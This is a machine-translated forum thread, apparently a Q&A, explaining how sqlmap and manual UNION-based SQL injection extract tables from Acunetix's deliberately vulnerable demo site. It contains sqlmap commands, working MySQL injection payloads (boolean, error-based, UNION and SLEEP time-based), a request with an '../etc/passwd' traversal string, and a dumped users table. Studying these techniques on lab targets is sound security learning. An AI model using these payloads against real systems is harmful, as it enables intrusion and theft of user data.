Sqlmapがデータベースからすべての情報を取得できる方法に興味がありますか? burpをプロキシとして使用して、すべての要求と応答を表示しています。応答から、データベースに関連する情報を確認できませんでしたが、sqlmapは関連情報を表示できました。たとえば、sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump --proxy = "http:// 192.168.0.115:8181 "、テーブルユーザーのacuart dbからレコードを取得できます。
これはsqlmapの出力です
[*] starting at 17:55:43
[17:55:43] [INFO] resuming back-end DBMS 'mysql'
[17:55:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 7494=7494
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT 4839 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (CASE WHEN (4839=4839) THEN 1 ELSE 0 END)),0x716a717871,FLOOR(Rand(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x616b7441734e6d755964,0x716a717871),NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: cat=1 AND (SELECT * FROM (SELECT(SLEEP(15)))Swtz)
---
[17:55:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[17:55:49] [INFO] fetching columns for table 'users' in database 'acuart'
[17:55:49] [INFO] fetching entries for table 'users' in database 'acuart'
[17:55:49] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| cc | name | cart | pass | uname | phone | email | address |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 0 | test | test | 2323345 | [email protected] | 21 street |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
[17:55:49] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[17:55:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 17:55:49
プロキシからのリクエスト:
GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache,no-store
プロキシからの応答:
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sun, 03 May 2015 13:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Content-Length: 7011
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName"><a href="http://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0"></a></h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
<div id="globalNav">
<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
<td align="left">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> |
<a href="guestbook.php">guestbook</a> |
<a href="AJAX/index.php">AJAX Demo</a>
</td>
<td align="right">
</td>
</tr></table>
</div>
</div>
<!-- end masthead -->
<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
<h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin.
</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div>
<!-- InstanceEndEditable -->
<!--end content -->
<div id="navBar">
<div id="search">
<form action="search.php?test=query" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<li><a href="AJAX/index.php">AJAX Demo</a></li>
</li>
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li>
</ul>
</div>
<div id="advert">
<p>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">
<param name="movie" value="Flash/add.swf">
<param name=quality value=high>
<embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>
</object>
</p>
</div>
</div>
<!--end navbar -->
<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact Us</a> | ©2006
Acunetix Ltd
</div>
<br>
</div>
</body>
<!-- InstanceEnd --></html>
あなたの説明は大歓迎です。ありがとうございました。
投稿したリクエストに問題があるようです。脆弱なパラメーターは「cat」パラメーターであるため、リクエストの「&」はペイロードを脆弱なパラメーターから分離し、結果として情報が公開されることはありません。
正しく実行しましょう:
のリクエスト:
列の数が元のクエリの数と異なることを示すエラーメッセージが表示されます。
エラー:使用されたSELECTステートメントの列数が異なります
メッセージが消えるまで列の数を増やして(カンマ区切りの番号を追加)、列の数を11にする必要があると判断します。
これは、次のリクエストが有効なページになるためです。
多くのアイテムがページに追加されたことがわかります。 7、2、および9の数字は、各アイテムで簡単に確認できます。それらの1つを受け取りたい情報(information_schema.tablesのtable_name)に置き換えると、探していた情報が得られます。
(usersテーブルは最後のアイテムにあります)
同じスポットを使用して、探している他のすべての情報を抽出できます。受け取りたい列とデータのあるテーブルを変更するだけです。
このスレッドはかなり古いですが、sqlmapの動作を知りたい人は、sqlmapコマンドの実行中に-v6(冗長レベル6)を使用してください。